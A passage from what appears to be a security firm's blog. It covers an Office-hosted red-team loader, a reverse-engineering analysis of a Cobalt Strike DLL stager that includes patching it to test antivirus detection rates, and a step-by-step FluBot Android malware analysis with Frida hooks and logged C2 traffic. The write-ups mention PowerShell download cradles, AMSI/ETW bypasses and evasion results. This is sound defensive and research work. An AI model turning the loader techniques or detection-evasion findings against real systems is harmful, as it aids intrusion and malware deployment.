For that reason I decided to continue with the project as a separate project, and honestly, now that the project is release ready, I’m glad I did it like this, because I learned a thing or two along the way about reflection. Such as the Assembly.EntryPoint property. I have given a reflection brown bag a while ago, but as you can see, even an old dog can learn new tricks.

Introducing the Marauders Map

The Marauders map is quite similar to SharpPack, although there are some subtle differences, as already mentioned I’m using ionic’s zip nuget package for all my encrypted zip shenanigans, additionally I added functionality to bypass ETW and AMSI (although on the open source version of this project, you will have to bring your own) and I added functionality to retrieve binaries over the web.

I recommend reading the excellent work of MDSec in their blogpost, but to give you a quick rundown of what Marauders Map (and sharppack, by extent) do ….

MaraudersMap is a DLL written completely in C# using the DLLExport project which is pretty much magic in a box. This project makes it possible to decorate any static function with the [DllExport] tag, making it possible to serve as an entrypoint for unmanaged code.
Essentially this means you can now run C# using rundll32 for example.

A much more interesting functionality however can be seen below:

The primary use case of the marauder map is to be used for internal pentests, or for leg up scenarios where you get full GUI access to a workstation or citrix environment.

Marauders map can be leveraged by the office suite to do all the juicy stuff listed below:

  • Run powershell commands such as whoami, or even full-fleged downloadcradles a la IEX(New-Object … )
  • Run powershell scrips from within an encrypted zip, unpacking it completely in memory
  • Run C# binaries from within an encrypted zip, unpacking it completely in memory
  • Run C# binaries fetched from the internet

All these options can be extended with ETW and AMSI bypasses, which are not included in the project by default, attempting to run as-is will result in output stating “bring your own :)”.

Seems to work on both 32 bit and 64 bit office versions, you just have to compile to the correct architecture.

The GitHub project and its necessary documentation can be found here: https://github.com/NVISOsecurity/blogposts/tree/master/MaraudersMap

Improvement

My initial thought was to get a PowerShell shell running in office, but for some reason the AllocConsole win32API call is not agreeing with office. If anyone knows how to fix this, submit a PR or shout me out on twitter. I had high hopes for this one. RIP PoshOffice (for now atleast)

Conclusion

Although open source tooling is great, you should not blindly run any tool you can find on GitHub without proper vetting of said tool first. It could lead to disasterous results such as leaving a permanent backdoor open at your clients environment. Additionally, leverage existing OST to hone your own coding skills further, when possible submit pull requests or create your own versions of existing OST. It will serve as a good learning school to learn more about coding but also about internal workings of specific processes.

Last but not least….

Jean-François Maes
Jean-François Maes

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course

Anatomy of Cobalt Strike’s DLL Stager

26 April 2021 at 16:51

NVISO recently monitored a targeted campaign against one of its customers in the financial sector. The attempt was spotted at its earliest stage following an employee’s report concerning a suspicious email. While no harm was done, we commonly identify any related indicators to ensure additional monitoring of the actor.

The reported email was an application for one of the company’s public job offers and attempted to deliver a malicious document. What caught our attention, besides leveraging an actual job offer, was the presence of execution-guardrails in the malicious document. Analysis of the document uncovered the intention to persist a Cobalt Strike stager through Component Object Model Hijacking.

During my free time I enjoy analyzing samples NVISO spots in-the-wild, and hence further dissected the Cobalt Strike DLL payload. This blog post will cover the payload’s anatomy, design choices and highlight ways to reduce both log footprint and time-to-shellcode.

Execution Flow Analysis

To understand how the malicious code works we have to analyze its behavior from start to end. In this section, we will cover the following flows:

  1. The initial execution through DllMain.
  2. The sending of encrypted shellcode into a named pipe by WriteBufferToPipe.
  3. The pipe reading, shellcode decryption and execution through PipeDecryptExec.

As previously mentioned, the malicious document’s DLL payload was intended to be used as a COM in-process server. With this knowledge, we can already expect some known entry points to be exposed by the DLL.

List of available entry points as displayed in IDA.

While technically the malicious execution can occur in any of the 8 functions, malicious code commonly resides in the DllMain function given, besides TLS callbacks, it is the function most likely to execute.

DllMain: An optional entry point into a dynamic-link library (DLL). When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions.

docs.microsoft.com/en-us/windows/win32/dlls/dllmain

Throughout the following analysis functions and variables have been renamed to reflect their usage and improve clarity.

The DllMain Entry Point

As can be seen in the following capture, the DllMain function simply executes another function by creating a new thread. This threaded function we named DllMainThread is executed without any additional arguments being provided to it.

Graphed disassembly of DllMain.

Analyzing the DllMainThread function uncovers it is an additional wrapper towards what we will discover is the malicious payload’s decryption and execution function (called DecryptBufferAndExec in the capture).

Disassembly of DllMainThread.

By going one level deeper, we can see the start of the malicious logic. Analysts experienced with Cobalt Strike will recognize the well-known MSSE-%d-server pattern.

Disassembly of DecryptBufferAndExec.

A couple of things occur in the above code:

  1. The sample starts by retrieving the tick count through GetTickCount and then divides it by 0x26AA. While obtaining a tick count is often a time measurement, the next operation solely uses the divided tick as a random number.
  2. The sample then proceeds to call a wrapper around an implementation of the sprintf function. Its role is to format a string into the PipeName buffer. As can be observed, the formatted string will be \\.\pipe\MSSE-%d-server where %d will be the result computed in the previous division (e.g.: \\.\pipe\MSSE-1234-server). This pipe’s format is a well-documented Cobalt Strike indicator of compromise.
  3. With the pipe’s name defined in a global variable, the malicious code creates a new thread to run WriteBufferToPipeThread. This function will be the next one we will analyze.
  4. Finally, while the new thread is running, the code jumps to the PipeDecryptExec routine.

So far, we had a linear execution from our DllMain entry point until the DecryptBufferAndExec function. We could graph the flow as follows:

Execution flow from DllMain until DecryptBufferAndExec.

As we can see, two threads are now going to run concurrently. Let’s focus ourselves on the one writing into the pipe (WriteBufferToPipeThread) followed by its reading counterpart (PipeDecryptExec) afterwards.

The WriteBufferToPipe Thread

The thread writing into the generated pipe is launched from DecryptBufferAndExec without any additional arguments. By entering into the WriteBufferToPipeThread function, we can observe it is a simple wrapper to WriteBufferToPipe except it furthermore passes the following arguments recovered from a global Payload variable (pointed to by the pPayload pointer):

  1. The size of the shellcode, stored at offset 0x4.
  2. A pointer to a buffer containing the encrypted shellcode, stored at offset 0x14.
Disassembly of WriteBufferToPipeThread.

Within the WriteBufferToPipe function we can notice the code starts by creating a new pipe. The pipe’s name is recovered from the PipeName global variable which, if you remember, was previously populated by the sprintf function. The code creates a single instance, outbound pipe (PIPE_ACCESS_OUTBOUND) by calling CreateNamedPipeA and then connects to it using the ConnectNamedPipe call.

Graphed disassembly of WriteBufferToPipe‘s named pipe creation.

If the connection was successful, the WriteBufferToPipe function proceeds to loop the WriteFile call as long as there are bytes of the shellcode to be written into the pipe.

Graphed disassembly of WriteBufferToPipe writing to the pipe.

One important detail worth noting is that once the shellcode is written into the pipe, the previously opened handle to the pipe is closed through CloseHandle. This indicates that the pipe’s sole purpose was to transfer the encrypted shellcode.

Once the WriteBufferToPipe function is completed, the thread terminates. Overall the execution flow was quite simple and can be graphed as follows:

Execution flow from WriteBufferToPipe.

The PipeDecryptExec Flow

As a quick refresher, the PipeDecryptExec flow was executed immediately after the creation of the WriteBufferToPipe thread. The first task performed by PipeDecryptExec is to allocate a memory region to receive shellcode to be transmitted through the named pipe. To do so, a call to malloc is performed with as argument the shellcode size stored at offset 0x4 of the global Payload variable.

Once the buffer allocation is completed, the code sleeps for 1024 milliseconds (0x400) and calls FillBufferFromPipe with both buffer location and buffer size as argument. Should the FillBufferFromPipe call fail by returning FALSE (0), the code loops again to the Sleep call and attempts the operation again until it succeeds. These Sleep calls and loops are required as the multi-threaded sample has to wait for the shellcode being written into the pipe.

Once the shellcode is written to the allocated buffer, PipeDecryptExec will finally launch the decryption and execution through XorDecodeAndCreateThread.

Graphed disassembly of PipeDecryptExec.

To transfer the encrypted shellcode from the pipe into the allocated buffer, FillBufferFromPipe opens the pipe in read-only mode (GENERIC_READ) using CreateFileA. As was done for the pipe’s creation, the name is retrieved from the global PipeName variable. If accessing the pipe fails, the function proceeds to return FALSE (0), resulting in the above described Sleep and retry loop.

Disassembly of FillBufferFromPipe‘s pipe access.

Once the pipe opened in read-only mode, the FillBufferFromPipe function proceeds to copy over the shellcode until the allocated buffer is filled using ReadFile. Once the buffer filled, the handle to the named pipe is closed through CloseHandle and FillBufferFromPipe returns TRUE (1).

Graphed disassembly of FillBufferFromPipe copying data.

Once FillBufferFromPipe has successfully completed, the named pipe has completed its task and the encrypted shellcode has been moved from one memory region to another.

Back in the caller PipeDecryptExec function, once the FillBufferFromPipe call returns TRUE the XorDecodeAndCreateThread function gets called with the following parameters:

  1. The buffer containing the copied shellcode.
  2. The length of the shellcode, stored at the global Payload variable’s offset 0x4.
  3. The symmetric XOR decryption key, stored at the global Payload variable’s offset 0x8.

Once invoked, the XorDecodeAndCreateThread function starts by allocating yet another memory region using VirtualAlloc. The allocated region has read/write permissions (PAGE_READWRITE) but is not executable. By not making a region writable and executable at the same time, the sample possibly attempts to evade security solutions which only look for PAGE_EXECUTE_READWRITE regions.

Once the region is allocated, the function loops over the shellcode buffer and decrypts each byte using a simple xor operation into the newly allocated region.

Graphed disassembly of XorDecodeAndCreateThread.

When the decryption is complete, the GetModuleHandleAndGetProcAddressToArg function is called. Its role is to place pointers to two valuable functions into memory: GetModuleHandleA and GetProcAddress. These functions should enable the shellcode to further resolve additional procedures without relying on them being imported. Before storing these pointers, the GetModuleHandleAndGetProcAddressToArg function first ensures a specific value is not FALSE (0). Surprisingly enough, this value stored in a global variable (here called zero) is always FALSE, resulting in the pointers never being stored.

Graphed disassembly of GetModuleHandleAndGetProcAddressToArg.

Back in the caller function, XorDecodeAndCreateThread changes the shellcode’s memory region to be executable (PAGE_EXECUTE_READ) using VirtualProtect and finally creates a new thread. This final thread starts at the JumpToParameter function which acts as a simple wrapper to the shellcode, provided as argument.

Disassembly of JumpToParameter.

From here, the previously encrypted Cobalt Strike shellcode stager executes to resolve WinINet procedures, download the final beacon and execute it. We will not cover the shellcode’s analysis in this post as it would deserve a post of its own.

While this last flow contained more branches and logic, the overall graph remains quite simple:

Execution flow from PipeDecryptExec until the shellcode.

Memory Flow Analysis

What was the most surprising throughout the above analysis was the presence of a well-known named pipe. Pipes can be used as a defense evasion mechanism by decrypting the shellcode at pipe exit or for inter-process communications; but in our case it merely acted as a memcpy to move encrypted shellcode from the DLL into another buffer.

Memory flow from encrypted shellcode until decryption.

So why would this overhead be implemented? As pointed out by another colleague, the answer lays in the Artifact Kit, a Cobalt Strike dependency:

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. […] One of the techniques [see: src-common/bypass-pipe.c in the Artifact Kit] generates executables and DLLs that serve shellcode to themselves over a named pipe. If an anti-virus sandbox does not emulate named pipes, it will not find the known bad shellcode.

cobaltstrike.com/help-artifact-kit

As we can see in the above diagram, the staging of the encrypted shellcode in the malloc buffer generates a lot of overhead supposedly for evasion. These operations could be avoided should XorDecodeAndCreateThread instead directly read from the initial encrypted shellcode as outlined in the next diagram. Avoiding the usage of named pipes will furthermore remove the need for looped Sleep calls as the data would be readily available.

Improved memory flow from encrypted shellcode until decryption.

It seems we found a way to reduce the time-to-shellcode; but do popular anti-virus solutions actually get tricked by the named pipe?

Patching the Execution Flow

To test that theory, let’s improve the malicious execution flow. For starters we could skip the useless pipe-related calls and have the DllMainThread function call PipeDecryptExec directly, bypassing pipe creation and writing. How the assembly-level patching is performed is beyond this blog post’s scope as we are just interested in the flow’s abstraction.

Disassembly of the patched DllMainThread.

The PipeDecryptExec function will also require patching to skip malloc allocation, pipe reading and ensure it provides XorDecodeAndCreateThread with the DLL’s encrypted shellcode instead of the now-nonexistent duplicated region.

Disassembly of the patched PipeDecryptExec.

With our execution flow patched, we can furthermore zero-out any unused instructions should these be used by security solutions as a detection base.

When the patches are applied, we end up with a linear and shorter path until shellcode execution. The following graph focuses on this patched path and does not include the leaves beneath WriteBufferToPipeThread.

Outline of the patched (red) execution flow and functions.

As we also figured out how the shellcode is encrypted (we have the xor key), we modified both samples to redact the actual C2 as it can be used to identify our targeted customer.

To ensure the shellcode did not rely on any bypassed calls, we spun up a quick Python HTTPS server and made sure the redacted domain resolved to 127.0.0.1. We then can invoke both the original and patched DLL through rundll32.exe and observe how the shellcode still attempts to retrieve the Cobalt Strike beacon, proving our patches did not affect the shellcode. The exported StartW function we invoke is a simple wrapper around the Sleep call.

Capture of both the original and patched DLL attempting to fetch the Cobalt Strike beacon.

Anti-Virus Review

So do named pipes actually work as a defense evasion mechanism? While there are efficient ways to measure our patches’ impact (e.g.: comparing across multiple sandbox solutions), VirusTotal does offer a quick primary assessment. As such, we submitted the following versions with redacted C2 to VirusTotal:

  • wpdshext.dll.custom.vir which is the redacted Cobalt Strike DLL.
  • wpdshext.dll.custom.patched.vir which is our patched and redacted Cobalt Strike DLL without named pipes.

As the original Cobalt Strike contains identifiable patterns (the named pipe), we would expect the patched version to have a lower detection ratio, although the Artifact Kit would disagree.

Capture of the original Cobalt Strike’s detection ratio on VirusTotal.
Capture of the patched Cobalt Strike’s detection ratio on VirusTotal.

As we expected, the named-pipe overhead leveraged by Cobalt Strike actually turned out to act as a detection base. As can be seen in the above captures, while the original version (left) obtained only 17 detections, the patched version (right) obtained one less for a total of 16 detections. Among the thrown-off solutions we noticed ESET and Sophos did not manage to detect the pipe-less version, whereas ZoneAlarm couldn’t identify the original version.

One notable observation is that an intermediary patch where the flow is adapted but unused code is not zeroed-out turned out to be the most detected version with a total of 20 hits. This higher detection rate occurs as this patch allows pipe-unaware anti-virus vendors to also locate the shellcode while pipe-related operation signatures are still applicable.

Capture of the intermediary patched Cobalt Strike’s detection ratio on VirusTotal.

While these tests focused on the default Cobalt Strike behavior against the absence of named pipes, one might argue that a customized named pipe pattern would have had the best results. Although we did not think of this variant during the initial tests, we submitted a version with altered pipe names (NVISO-RULES-%d instead of MSSE-%d-server) the day after and obtained 18 detections. As a comparison, our two other samples had their detection rate increase to 30+ over night. We however have to consider the possibility that these 18 detections are influenced by the initial shellcode being burned.

Conclusion

Reversing the malicious Cobalt Strike DLL turned out to be more interesting than expected. Overall, we noticed the presence of noisy operations whose usage weren’t a functional requirement and even turn out to act as a detection base. To confirm our hypothesis, we patched the execution flow and observed how our simplified version still reaches out to the C2 server with a lowered (almost unaltered) detection rate.

So why does it matter?

The Blue

First and foremost, this payload analysis highlights a common Cobalt Strike DLL pattern allowing us to further fine-tune detection rules. While this stager was the first DLL analyzed, we did take a look at other Cobalt Strike formats such as default beacons and those leveraging a malleable C2, both as Dynamic Link Libraries and Portable Executables. Surprisingly enough, all formats shared this commonly documented MSSE-%d-server pipe name and a quick search for open-source detection rules showed how little it is being hunted for.

The Red

Besides being helpful for NVISO’s defensive operations, this research further comforts our offensive team in their choice of leveraging custom-built delivery mechanisms; even more so following the design choices we documented. The usage of named pipes in operations targeting mature environments is more likely to raise red flags and so far does not seem to provide any evasive advantage without alteration in the generation pattern at least.


To the next actor targeting our customers: I am looking forward to modifying your samples and test the effectiveness of altered pipe names.

Maxime Thiebaut
Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified intrusion analyst in NVISO’s Managed Detection & Response team. He spends most of his time investigating incidents and improving detection capabilities. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

How to analyze mobile malware: a Cabassous/FluBot Case study

19 April 2021 at 12:20

This blogpost explains all the steps I took while analyzing the Cabassous/FluBot malware. I wrote this while analyzing the sample and I’ve written down both successful and failed attempts at moving forward, as well as my thoughts/options along the way. As a result, this blogpost is not a writeup of the Cabassous/FluBot malware, but rather a step-by-step guide on how you can examine the malware yourself and what the thought process can be behind examining mobile malware. Finally, it’s worth mentioning that all the tools used in this analysis are open-source / free.

If you want a straightforward writeup of the malware’s capabilities, there’s an excellent technical write up by ProDaft (pdf) and a writeup by Aleksejs Kuprins with more background information and further analysis. I knew these existed before writing this blogpost, but deliberately chose not to read them first as I wanted to tackle the sample ‘blind’.

Our goal: Intercept communication between the malware sample and the C&C and figure out which applications are being attacked.

The sample

Cabassous/FluBot recently popped up in Europe where it is currently expanding quite rapidly. The sample I examined is attacking Spanish mobile banking applications, but German, Italian and Hungarian versions have been spotted recently as well.

In this post, we’ll be taking a look at this sample (acb38742fddfc3dcb511e5b0b2b2a2e4cef3d67cc6188b29aeb4475a717f5f95). I’ve also uploaded this sample to the Malware Bazar website if you want to follow along.

This is live malware

Note that this is live malware and you should never install this on a device which contains sensitive information.

Starting with some static analysis

I usually make the mistake of directly going to dynamic analysis without some recon first, so this time I wanted to start things slow. It also takes some time to reset my phone after it has been infected, so I wanted to get the most out of my first install by placing Frida hooks where necessary.

First steps

The first thing to do is find the starting point of the application, which is listed in the AndroidManifest:

<activity android:name="com.tencent.mobileqq.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.tencent.mobileqq.IntentStarter">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>

So we need to find com.tencent.mobileqq.MainActivity. After opening the sample with Bytecode Viewer, there unfortunately isn’t a com.tencent.mobileqq package. There are however a few other interesting things that Bytecode Viewer shows:

  • There’s a classes-v1.bin file in a folder called ‘dex’. While this file probably contains dex bytecode, it currently isn’t identified by the file utility and is probably encrypted.
  • There is a com.whatsapp package with what appear to be legitimate WhatsApp classes
  • There are three top-level packages that are suspicious: n, np and obfuse
  • There’s a libreactnativeblob.so which probably belongs to WhatsApp as well

Comparing the sample to WhatsApp

So it seems that the malware authors repackaged the official WhatsApp app and added their malicious functionality. Now that we know that, we can compare this sample to the official WhatsApp app and see if any functionality was added in the com.whatsapp folder. A good tool for comparing apks is apkdiff.

Which version to compare to?

I first downloaded the latest version of WhatsApp from the Google Play store, but there were way too many differences between that version and the sample. After digging around the com.whatsapp folder for a bit, I found the AbstractAppShell class which contains a version identifier: 2.21.3.19-play-release. A quick google search leads us to apkmirror which has older versions for download.

This image has an empty alt attribute; its file name is whatsappversion-1024x545.png

So let’s compare both versions using apkdiff:

python3 apkdiff.py ../com.whatsapp_2.21.3.19-210319006_minAPI16\(x86\)\(nodpi\)_apkmirror.com.apk ../Cabassous.apk

Because the malware stripped all the resource files from the original WhatsApp apk, apkdiff identifies 147 files that were modified. To reduce this output, I added ‘xml’ to the ignore list of apkdiff.py on line 14:

at = "at/"
ignore = ".*(align|apktool.yml|pak|MF|RSA|SF|bin|so|xml)"
count = 0

After running apkdiff again, the output is much shorter with only 4 files that are different. All of them differ in their labeling of try/catch statements and are thus not noteworthy.

Something’s missing…

It’s pretty interesting to see that apkdiff doesn’t identify the n, np and obfuse packages. I would have expected them to show up as being added in the malware sample, but apparently apkdiff only compares files that exist in both apks.

Additionally, apkdiff did not identify the encrypted dex file (classes-v1.bin). This is because, by default, apkdiff.py ignores files with the .bin extension.

So to make sure no other files were added, we can run a normal diff on the two smali folders after having used apktool to decompile them:

diff -rq Cabassous com.whatsapp_2.21.3.19-210319006_minAPI16\(x86\)\(nodpi\)_apkmirror.com | grep -i "only in Cabassous/smali"

It looks like no other classes/packages were added, so we can start focusing on the n, np and obfuse packages.

Examining the obfuscated classes

We still need to find the com.tencent.mobileqq.MainActivity class and it’s probably inside the encrypted classes-v1.bin file. The com.tencent package name also tells us that the application has probably been packaged with the tencent packer. Let’s use APKiD to see if it can detect the packer:

Not much help there; it only tells us that the sample has been obfuscated but it doesn’t say with which packer. Most likely the tencent packer was indeed used, but it was then obfuscated with a tool unknown to APKiD.

So let’s take a look at those three packages that were added ourselves. Our main goal is to find any references to System.load or DexClassLoader, but after scrolling through the files using different decompilers in Bytecode Viewer, I couldn’t really find any. The classes use string obfuscation, control flow obfuscation and many of the decompilers are unable to decompile entire sections of the obfuscated classes.

There are however quite some imports for Java reflection classes, so the class and method names are probably constructed at runtime.

We could tackle this statically, but that’s a lot of work. The unicode names are also pretty annoying, and I couldn’t find a script that deobfuscates these, apart from the Pro version of the JEB decompiler. At this point, it would be better to move onto dynamic analysis and use some create Frida hooks to figure out what’s happening. But there’s one thing we need to solve first…

How is the malicious code triggered?

How does the application actually trigger the obfuscated functionality? It’s not inside the MainActivity (which doesn’t even exist yet), which is the first piece of code that will be executed when launching the app. Well, this is a trick that’s often used by malware to hide functionality or to perform anti-debugging checks before the application actually starts. Before Android calls the MainActivity’s onCreate method, all required classes are loaded into memory. After they are loaded in memory, all Static Initialization Blocks are executed. Any class can have one of these blocks, and they are all executed before the application actually starts.

The application contains many of these static initializers, both in the legitimate com.whatsapp classes and in the obfuscated classes:

Most likely, the classes-v1.bin file gets decrypted and loaded in one of the static initialization blocks, so that Android can then find the com.tencent.mobileqq.MainActivity and call its onCreate method.

On to Dynamic Analysis…

The classes-v1.bin file will need to be decrypted and then loaded. Since we are missing some classes, and since the file is inside a ‘dex’ folder, it’s a pretty safe bet that it would decrypt to a dex file. That dex file then needs to be loaded using the DexClassLoader. A tool that’s perfect for the job here is Dexcalibur by @FrenchYeti. Dexcalibur allows us to easily hook many interesting functions using Frida and is specifically aimed at apps that use reflection and dynamic loading of classes.

For my dynamic testing, I’ve installed LineageOS + TWRP on an old Nexus 5, I’ve installed Magisk, MagiskTrustUserCerts and Magisk Frida Server. I also installed ProxyDroid and configured it to connect to my Burp Proxy. Finally, I installed Burp’s certificate, made sure everything was working and then performed a backup using TWRP. This way, I can easily restore my device to a clean state and run the malware sample again and again for the first time. Since the malware doesn’t affect the /system partition, I only need to restore the /data/ permission. You could use an emulator, but not all malware will have x86 binaries and, furthermore, emulators are easily detected. There are certainly drawbacks as well, such as the restore taking a few minutes, but it’s currently fast enough for me to not be annoyed by it.

Resetting a device is easy with TWRP

Making and restoring backups is pretty straightforward in TWRP. You first boot into TWRP by executing ‘adb reboot recovery‘. Each phone also has specific buttons you can press during boot, but using adb is much more nicer and consistent.
In order to create a backup, go to Backup and select the partitions you want to create a backup of. In this case, we should do System, Data and Boot. Slide the slider at the bottom to the right and wait for the backup to finish.
In order to restore a backup, go to Restore and select the backup you created earlier. You can choose which partitions you want to restore and then swipe the slider to the right again.

After setting up a device and creating a project, we can start analyzing. Unfortunately, the latest version of Dexcalibur wasn’t too happy with the SMALI code inside the sample. Some lines have whitespace where it isn’t supposed to be, and there are a few illegal constructions using array definitions and goto labels. Both of them were fixed within 24 hours of reporting which is very impressive!

When something doesn’t work…

Almost all the tools we use in mobile security are free and/or open source. When something doesn’t work, you can either find another tool that does the job, or dig into the code and figure out exactly why it’s not working. Even by just reporting an issue with enough information, you’re contributing to the project and making the tools better for everyone in the future. So don’t hesitate to do some debugging!

So after pulling the latest code (or making some quick hotpatches) we can run the sample using dexcalibur. All hooks will be enabled by default, and when running the malware Dexcalibur lists all of the reflection API calls that we saw earlier:

We can see that some visual components are created, which corresponds to what we see on the device, which is the malware asking for accessibility permissions.

At this point, one of the items in the hooks log should be the dynamic loading of the decrypted dex file. However, there’s no such call and this actually had me puzzled for a little while. I thought maybe there was another bug in Dexcalibur, or maybe the sample was using a class or method not covered by Dexcalibur’s default list of hooks, but none of this turns out to be the case.

Frida is too late 🙁

Frida scripts only run when the runtime is ready to start executing. At that point, Android will have loaded all the necessary classes but hasn’t started execution yet. However, static initializers are run during the initialization of the classes which is before Frida hooks into the Android Runtime. There’s one issue reported about this on the Frida GitHub repository but it was closed without any remediation. There are a few ways forward now:

  • We manually reverse engineer the obfuscated code to figure out when the dex file is loaded into memory. Usually, malware will remove the file from disk as soon as it is loaded in memory. We can then remove the function that removes the decrypted dex file and simply pull it from the device.
  • We dive into the smali code and modify the static initializers to normal static functions and call all of them from the MainActivity.onCreate method. However, since the Activity defined in the manifest is inside the encrypted dex file, we would have to update the manifest as well, otherwise Android would complain that it can’t find the main activity as it hasn’t been loaded yet. A real chicken/egg problem.
  • Most (all?) methods can be decompiled by at least one of the decompilers in Bytecode Viewer, and there aren’t too many methods, so we could copy everything over to a new Android project and simply debug the application to figure out what is happening. We could also trick the new application to decrypt the dex file for us.

But…. None of that is necessary. While figuring out why the hooks weren’t called, I took a look at the application’s storage and after the sample has been run once, it actually doesn’t delete the decrypted dex file and simply keeps it in the app folder.

So we can copy it off the device by moving it to a world-readable location and making the file world-readable as well.

kali > adb shell
hammerhead:/ $ su
hammerhead:/ # cp /data/data/com.tencent.mobileqq/app_apkprotector_dex /data/local/tmp/classes-v1.bin
hammerhead:/ # chmod 666 /data/local/tmp/classes-v1.bin
hammerhead:/ # exit
hammerhead:/ $ exit
kali > adb pull /data/local/tmp/classes-v1.bin payload.dex
/data/local/tmp/classes-v1.bin: 1 file pulled. 18.0 MB/s (3229988 bytes in 0.171s)

But now that we’ve got the malware running, let’s take a quick look at Burp. Our goal is to intercept C&C traffic, so we might already be done!

While we are indeed intercepting C&C traffic, everything seems to be encrypted, so we’re not done just yet.

… and back to static

Since we now have the decrypted dex file, let’s open it up in Bytecode Viewer again:

The payload doesn’t have any real anti-reverse engineering stuff, apart from some string obfuscation. However, all the class and method names are still there and it’s pretty easy to understand most functionality. Based on the class names inside the com.tencent.mobileqq package we can see that the sample can:

  • Perform overlay attacks (BrowserActivity.class)
  • Start different intens (IntentStarter.class)
  • Launch an accessibility service (MyAccessibilityService.class)
  • Compose SMS messages (ComposeSMSActivity)
  • etc…

The string obfuscation is inside the io.michaelrocks.paranoid package (Deobfuscator$app$Release.class) and the source code is available online.

Another interesting class is DGA.class which is responsible for the Domain Generation Algorithm. By using a DGA, the sample cannot be taken down by sink-holing the C&C’s domain. We could reverse engineer this algorithm, but that’s not really necessary as the sample can just do it for us. At this point we also don’t really care which domain it actually ends up connecting to. We can actually see the DGA in action in Burp: Before the sample is able to connect to a legitimate C&C it tries various different domain names (requests 46 – 56), after which it eventually finds a C&C that it likes (requests 57 – 60):

So the payloads are encrypted/obfuscated and we need to figure out how that’s done. After browsing through the source a bit, we can see that the class that’s responsible for actually communicating with the C&C is the PanelReq class. There are a few methods involving encryption and decryption, but there’s also one method called ‘Send’ which takes two parameters and contains references to HTTP related classes:

public static String Send(String paramString1, String paramString2)
{
    try
    {
        HttpCom localHttpCom = new com/tencent/mobileqq/HttpCom;
        localHttpCom.<init>();
        localHttpCom.SetPort(80);
        localHttpCom.SetHost(paramString1);
        localHttpCom.SetPath(Deobfuscator.app.Release.getString(-37542252460644L));
        paramString1 = Deobfuscator.app.Release.getString(-37585202133604L);

We can be pretty sure that ‘paramString1’ is the hostname which is generated by the DGA. The second string is not immediately added to the HTTP request and various cryptographic functions are applied to it first. This is a strong indication that paramString2 will not be encrypted when it enters the Send method. Let’s hook the Send method using Frida to see what it contains.

The following Frida script contains a hook for the PanelReq.Send() method:

Java.perform(function(){
    var PanelReqClass = Java.use("com.tencent.mobileqq.PanelReq");
    PanelReqClass.Send.overload('java.lang.String', 'java.lang.String').implementation = function(hostname, payload){
        console.log("hostname:"+hostname);
        console.log("payload:"+payload);
        var retVal = this.Send(hostname, payload);
        console.log("Response:" + retVal)
        console.log("------");
        return retVal;
    }
});

Additionally, we can hook the Deobfuscator.app.Release.getString method to figure out which strings are returned after decrypting them, but in the end this wasn’t really necessary:

var Release = Java.use("io.michaelrocks.paranoid.Deobfuscator$app$Release");
Release.getString.implementation = function (id){
    var retVal = this.getString(id);
    console.log(id + " > " + retVal);
    console.log("---")
    return retVal;
}

Monitoring C&C traffic

After performing a reset of the device and launching the sample with Frida and the overloaded Send method, we get the following output:

...
hostname:vtcslaabqljbnco[.]com
payload:PREPING,
Response:null
------
hostname:urqisbcliipfrac[.]com
payload:PREPING,
Response:null
------
hostname:vloxaloyfmdqxti[.]ru
payload:PREPING,
Response:OK
------
hostname:cjcpldfquycghnf[.]ru
payload:PREPING,
Response:null
------
Response:nullhostname:vloxaloyfmdqxti[.]ru
payload:PING,3.4,10,LGE,Nexus 5,en,127,
Response:
------
hostname:vloxaloyfmdqxti.ru
payload:SMS_RATE
Response: 10
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_INJECTS_LIST,com.google.android.carriersetup,org.lineageos.overlay.accent.black,com.android.cts.priv.ctsshim,org.lineageos.overlay.accent.brown,...,com.android.theme.icon_pack.circular.android,com.google.android.apps.restore
Response:
------
hostname:vloxaloyfmdqxti[.]ru
payload:LOG,AMI_DEF_SMS_APP,1
Response:OK
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_SMS
Response:648516978,Capi: El envio se ha devuelto dos veces al centro mas cercano codigo: AMZIPH1156020 
 http://chiangma[...].com/track/?sl6zxys4ifyp
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_SMS
Response:634689547,No hemos dejado su envio 01101G573629 por estar ausente de su domicilio. Vea las opciones: 
 http://chiangma[...].com/track/?7l818osbxj9f
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_SMS
Response:699579720,Hola, no te hemos localizado en tu domicilio. Coordina la entrega de tu envio 279000650 aqui: 
 http://chiangma[...].com/track/?uk5imbr210yue
------
hostname:vloxaloyfmdqxti[.]ru
payload:LOG,AMI_DEF_SMS_APP,0
Response:OK
------
hostname:vloxaloyfmdqxti[.]ru
payload:PING,3.4,10,LGE,Nexus 5,en,197,
Response:
------
...

Some observations:

  • The sample starts with querying different domains until it finds one that answers ‘OK’ (Line 14). This confirms with what we saw in Burp.
  • It sends a list of all installed applications to see which applications to attack using an overlay (Line 27). Currently, no targeted applications are installed, as the response is empty
  • Multiple premium text messages are received (Lines 36, 41, 46, …)

Package names of targeted applications are sometimes included in the apk, or a full list is returned from the C&C and compared locally. In this sample that’s not the case and we actually have to start guessing. There doesn’t appear to be a list of financial applications available online (or at least, I didn’t find any) so I basically copied all the targeted applications from previous malware writeups and combined them into one long list. This does not guarantee that we will find all the targeted applications, but it should give us pretty good coverage.

In order to interact with the C&C, we can simply modify the Send hook to overwrite the payload. Since the sample is constantly polling the C&C, the method is called repeatedly and any modifications are quickly sent to the server:

Java.perform(function(){
    var PanelReqClass = Java.use("com.tencent.mobileqq.PanelReq");
